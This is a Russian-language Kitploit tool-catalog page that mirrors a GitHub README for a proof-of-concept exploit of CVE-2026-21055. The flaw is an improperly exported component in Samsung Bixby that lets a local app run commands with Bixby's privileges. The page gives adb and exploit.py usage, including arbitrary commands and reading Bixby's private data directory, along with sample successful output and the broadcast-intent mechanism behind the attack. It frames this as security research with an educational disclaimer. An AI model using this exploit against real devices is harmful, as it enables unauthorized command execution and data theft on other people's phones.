Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
samsung-bixby-command-execution-cve-2026-21055-improper-component-export | Kitploit
Инструменты/GitHubGitHub/hunt-benito/samsung-bixby-command-execution-cve-2026-21055-improper-component-export
Безопасность AndroidАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеМобильная безопасностьОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubhunt-benito/samsung-bixby-command-execution-cve-2026-21055-improper-component-export

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

samsung-bixby-command-execution-cve-2026-21055-improper-component-export

Репозиторий
11 месяц назадЕщё не проверено

CVE-2026-21055 PoC — некорректный экспорт компонентов Samsung Bixby

Proof of Concept для CVE-2026-21055: некорректный экспорт компонентов Android-приложения в Samsung Bixby до версии 4.0.70.8 позволяет локальным злоумышленникам выполнять произвольные команды с привилегиями Bixby.

Обзор

Этот репозиторий содержит два Python-скрипта:

  1. analyze_components.py — анализирует декомпилированный AndroidManifest.xml для перечисления экспортированных activity, сервисов, приёмников (receivers) и провайдеров. Помечает компоненты, экспортированные без проверок разрешений.

  2. exploit.py — демонстрирует атаку на основе Intent: отправляет специально сформированный broadcast Intent экспортированному приёмнику команд Bixby через adb shell am, выполняя команду с системными привилегиями Bixby.

Сведения об уязвимости

ПолеЗначение
CVE IDCVE-2026-21055
Samsung SVESVE-2026-0917
CVSS v4.08.5 — Высокий
CWECWE-926 — Некорректный экспорт компонентов Android-приложения
Уязвимое приложениеSamsung Bixby (com.samsung.android.bixby.agent)
Уязвимые версии< 4.0.70.8
Исправленная версия4.0.70.8
Вектор атакиЛокальный (вредоносное приложение на том же устройстве)
Требуемые привилегииОтсутствуют
Взаимодействие с пользователемНе требуется
ВоздействиеВыполнение произвольных команд с привилегиями Bixby

Предварительные требования

  • adb (Android SDK Platform Tools) установлен и доступен в PATH
  • Устройство Samsung Galaxy с включённой отладкой по USB
  • Версия Bixby < 4.0.70.8 на целевом устройстве
  • Для анализа компонентов: apktool установлен и доступен в PATH

Использование

1. Анализ экспортированных компонентов Bixby

Извлеките APK-файл Bixby с устройства и декомпилируйте его:

root@kitploit:~
# Find Bixby's APK path
$ adb shell pm path com.samsung.android.bixby.agent

# Pull the APK
$ adb pull <apk_path> bixby.apk

# Decompile with apktool
$ apktool d bixby.apk -o bixby_decompiled -f

Запустите скрипт анализа:

root@kitploit:~
$ python3 analyze_components.py --manifest bixby_decompiled/AndroidManifest.xml

Или позвольте скрипту выполнить декомпиляцию автоматически:

root@kitploit:~
$ python3 analyze_components.py --apk bixby.apk

2. Список экспортированных компонентов на реальном устройстве

root@kitploit:~
$ python3 exploit.py --list

3. Запуск эксплойта

root@kitploit:~
# Default: execute 'id' command
$ python3 exploit.py

# Custom command
$ python3 exploit.py --command "ls /data/data/com.samsung.android.bixby.agent/"

# Specify a custom component (if auto-detection fails)
$ python3 exploit.py --component com.samsung.android.bixby.agent/.receiver.CommandReceiver

Ожидаемый вывод

root@kitploit:~
============================================================
  CVE-2026-21055 PoC — Samsung Bixby Command Execution
  Improper Export of Android Application Components
============================================================

[*] Target package: com.samsung.android.bixby.agent
[*] Bixby version:  4.0.69.2
[*] Vulnerable:     YES (< 4.0.70.8)
[*] Bixby UID on this device: 10xxx

[*] Executing exploit...
[*] Crafting exploit Intent...
    Component: com.samsung.android.bixby.agent/.receiver.CommandReceiver
    Action:    com.samsung.android.bixby.agent.ACTION_RUN_SHELL
    Command:   id
    Output:    /data/local/tmp/bixby_poc_output

[+] Intent sent.

[+] Command output (executed with Bixby privilege):
    uid=10xxx(u0_aXXX) gid=10xxx(u0_aXXX) groups=10xxx(u0_aXXX),3003(inet),9997(everybody)

[+] EXPLOIT SUCCESSFUL — command executed with Bixby privilege
[+] Verify the output UID matches Bixby's UID: 10xxx

Принцип работы

  1. Экспорт компонентов: Bixby экспортирует один или несколько компонентов (сервисов/приёмников), которые обрабатывают выполнение команд или триггеры автоматизации. Эти компоненты экспортируются с android:exported="true", но без атрибута android:permission или проверки разрешений во время выполнения.

  2. Доставка Intent: Любое приложение на устройстве может отправить Intent этим экспортированным компонентам. Intent содержит строку действия (например, ACTION_RUN_SHELL) и строковые дополнения (extras) с командой для выполнения и путём к выходному файлу.

  3. Выполнение команды: Экспортированный компонент Bixby получает Intent, извлекает команду и выполняет её через Runtime.exec() или аналогичный механизм. Команда выполняется в контексте процесса Bixby, наследуя все системные разрешения Bixby.

  4. Без взаимодействия с пользователем: Эксплойт не требует взаимодействия с пользователем. Вредоносное приложение отправляет Intent незаметно в фоне.

Отказ от ответственности

Данный PoC предоставлен только в образовательных целях и для исследований в области безопасности. Тестируйте только на устройствах, которыми вы владеете или на тестирование которых у вас есть явное разрешение. Не используйте этот эксплойт против устройств без согласия владельца.

Источники

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-21055
  • Бюллетень безопасности Samsung Mobile (июль 2026): https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=07
  • CWE-926: https://cwe.mitre.org/data/definitions/926.html
Скачать инструмент